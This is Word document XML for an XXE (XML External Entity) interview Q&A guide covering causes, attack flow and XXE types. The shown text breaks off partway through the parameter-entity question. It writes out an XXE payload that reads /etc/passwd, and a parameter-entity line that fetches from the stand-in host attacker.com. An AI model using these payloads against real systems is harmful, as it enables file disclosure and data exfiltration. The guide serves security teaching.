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AA1B" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="7E699E1F">
          <v:rect id="_x0000_i1193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61B8CE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🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE (XML External Entity) — Interview Q&amp;A (Simple + Complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB9F5D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="34E417E7">
          <v:rect id="_x0000_i1194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D753E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Q1: What is XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27D025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086908C4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"XXE (XML External Entity) is a vulnerability where attacker injects malicious XML to make server read internal files or interact with other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081FB47" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One line:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Server processes external entities from user input."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591B5D9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="2D75D083">
          <v:rect id="_x0000_i1195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA249E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Q2: Why does XXE happen?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B92A0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4814B3B4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"XXE happens because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EE757" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">XML parser allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>external entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513DE479" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>User input is not validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72D710" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key line:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> External entity processing is enabled."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B16A3D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="1BCCF208">
          <v:rect id="_x0000_i1196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F456F70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Q3: What is DTD and Entity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D10E41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601CA31C" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DTD (Document Type Definition):</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Defines XML structure/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA5EA9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Acts like variable (e.g., &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE4C0B" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>External entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> → cause XXE vulnerability"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB802E2" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="206DD87A">
          <v:rect id="_x0000_i1197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57537D7A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Q4: How does XXE work? (Flow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901A84F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6D5DFC88" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>App accepts XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADDA47" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BACC9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Attacker injects entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48407070" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B265539" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Parser processes it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0520F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978E815" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>Server reads file / sends request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C5747" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3116834F">
          <v:rect id="_x0000_i1198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D1D22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Q5: Basic XXE Payload (File Read)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483348C4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727B4F82" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA612ED" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;!DOCTYPE test [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21311319" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B66971" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7F934" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;user&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;&lt;/user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620221E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="918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5244"/>
      </w:tblGrid>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="2371AAB5" w14:textId="77777777" w:rsidTr="00455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9DE1F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5199" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605B239A" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="125A3B8C" w14:textId="77777777" w:rsidTr="0045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9A79" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>&lt;!DOCTYPE test [</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5199" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7769010D" w14:textId="1F29BBA6" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r w:rsidRPr="00455B56">
              <w:t>Start DTD (rules section)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="29EA25F8" w14:textId="77777777" w:rsidTr="0045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2C06" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve">&lt;!ENTITY </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00455B56">
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5199" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C4A492" w14:textId="0A6ECDA5" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve">Create variable </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00455B56">
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00455B56">
              <w:t xml:space="preserve"> that reads file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="3C107F49" w14:textId="77777777" w:rsidTr="0045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6606" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>]&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5199" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47B9C03B" w14:textId="5690C1FC" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00455B56">
              <w:t>Close DTD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="686EB7E2" w14:textId="77777777" w:rsidTr="00455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E3EA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>&lt;user&gt;&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00455B56">
              <w:t>xxe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00455B56">
              <w:t>;&lt;/user&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5199" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11078464" w14:textId="22209214" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r w:rsidRPr="00455B56">
              <w:t>Use variable → server replaces with file content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A9144D8" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Server returns /etc/passwd content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B1A51" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="47B83003">
          <v:rect id="_x0000_i1199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD550A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Q6: What are the types of XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B442A5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417"/>
      </w:tblGrid>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="0F9A0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D5789" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B5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C3E0F5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="10A1D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6DB5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>In-Band XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EF6FD4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Data directly visible in response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="075FC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F0F4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Blind (OOB) XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32587A7D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>No output → server contacts attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="676A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50724" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Parameter Entity XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21AF916C" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Uses % entities (advanced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="2F754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BF55" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Billion Laughs (DoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1001C87E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Memory exhaustion → server crash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455B56" w:rsidRPr="00455B56" w14:paraId="0C12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CB2E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Error-Based XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308F7F46" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
            <w:r w:rsidRPr="00455B56">
              <w:t>Trigger error to leak info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BB5BD11" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="0016B36B">
          <v:rect id="_x0000_i1200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46230C05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Q7: What is In-Band XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990E34C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566CBF63" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"In-Band XXE is when stolen data is directly visible in response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F71E92" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> /etc/passwd content shown in response."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C8634" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="01EDB890">
          <v:rect id="_x0000_i1201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73955773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Q8: What is Blind (Out-of-Band) XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348B975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57FF9FE2" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"Blind XXE is when no data/output is visible in response. Server sends request to attacker instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A58DE7" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> No response, no error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E418080" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Use Burp Collaborator (DNS/HTTP interaction)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EBA770" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="17CE11A2">
          <v:rect id="_x0000_i1202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18832D9C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Q9: What is Parameter Entity XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B797CCE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7EB5E172" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"Parameter Entity XXE uses % instead of &amp; in DTD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296C0EF" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7467AB" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9D29A" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "http://attacker.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD142B9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
